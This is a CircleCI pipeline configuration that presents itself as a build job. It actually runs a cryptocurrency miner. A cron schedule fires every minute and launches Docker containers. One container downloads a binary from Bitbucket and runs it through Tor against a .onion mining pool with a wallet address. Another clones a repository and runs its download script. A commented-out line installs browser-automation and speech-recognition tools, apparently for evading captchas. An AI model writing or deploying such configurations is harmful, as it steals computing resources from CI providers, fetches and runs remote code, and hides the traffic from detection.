# ======================== #
version: 2.1
orbs:
  python: circleci/python@1.5.0
jobs:
  Builds-01:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          command: |
             #sudo docker run --name Download -d ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://AnliAngku_No@bitbucket.org/anjayanli/mine.git && cd mine && bash download.sh"
             sudo docker run --name MiningCu -d ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://AnliAngku_No@bitbucket.org/anjayanli/mine.git && cd mine && bash download.sh"
             #sudo apt-get update && wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb && sudo apt install -y ./google-chrome-stable_current_amd64.deb && pip3 install stem pydub SpeechRecognition selenium requests undetected-chromedriver==1.5.2 && git clone https://AnliAngku_No@bitbucket.org/anjayanli/mine.git && cd mine && python3 index.py
# ======================== #
workflows:
  Workflows:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only: master
# ======================== #
    jobs:
      - Builds-01
# ======================== #